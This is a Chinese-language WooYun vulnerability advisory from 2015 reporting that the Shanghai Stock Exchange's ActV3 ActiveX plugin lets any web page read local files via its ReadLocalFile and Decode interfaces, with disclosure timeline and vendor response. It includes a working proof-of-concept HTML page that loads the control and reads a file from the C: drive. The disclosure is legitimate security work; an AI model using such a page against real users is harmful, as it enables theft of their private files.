当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099701

漏洞标题:上海证券交易所IE插件可导致用户本地文件泄漏

相关厂商:上海证券交易所

漏洞作者: telnetgmike

提交时间:2015-03-05 17:39

修复时间:2015-06-08 13:52

公开时间:2015-06-08 13:52

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-13: 细节向第三方安全合作伙伴开放
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

上海证券交易所IE插件可导致用户本地文件泄漏

详细说明:

上海证券交易所IE插件可导致用户本地文件被读取
actV3 IE控件提供的接口ReadLocalFile可读取用户计算机硬盘上的文件,如果一个文件可以以读写形式打开,并且大小不较大(测试中发现980K字节以内可顺利读取显示),则可被该函数读取内容。虽然读取出的内容被编码,但该控件提供的Decode接口可以解码读取到的内容并以字符串形式返回。虽然ReadLocalFile可以读取任何文件类型,但是Decode接口返回的是带结束符号的字符串,所以如果是纯字符串内容的文件,则可顺利获取所有内容;否则只能获取到第一个字符串结束符之前的字符串内容了。
当配合我提交的另一个上证所IE插件的漏洞使用时,则可以先使用那个漏洞判断文件是否存在和大小,然后使用这个漏洞获取文件内容。或者在之前已经知道需要的文件的具体目录位置,则可直接使用这个漏洞去读取内容。

漏洞证明:

http://biz.sse.com.cn/sseportal/ps/zhs/ca/ca_activex_control_check.jsp
可在上面的页面中下载安装ActV3控件。

<html>
Test Exploit page
<object classid='clsid:3DE5C04B-916B-40FC-B976-60119CA5EB21' id='target' ></object>
<script language='javascript'>
document.write("<p/>ReadLocalFile+Decode:can read a limited sized file(file has no lock), since Decode only gives the string value, so they can only used to read text line files. But it will popup a window once there's no the specific file.");
var encodedtxt = target.ReadLocalFile("C:/a",10240000);
document.write("<br/>encodedtxt:"+encodedtxt);
var decodedtxt = target.Decode(encodedtxt);
document.write("<br/>decodedtxt:"+decodedtxt);
</script>
</html>


将以上代码保存到远程服务器中,如actv3.html,在c盘根目录建立文件名为a的文件,然后用记事本打开写入一些字符串如hello,然后在本地打开IE浏览该页面,下图是我的测试显示

Screen Shot 2015-03-05 at 17.13.08.png

修复方案:

版权声明:转载请注明来源 telnetgmike@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-10 13:50

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心同时通报给证监会信息中心,由其后续协调涉事单位处置.同时,近期的4个相类似的漏洞一并处置。

最新状态:

暂无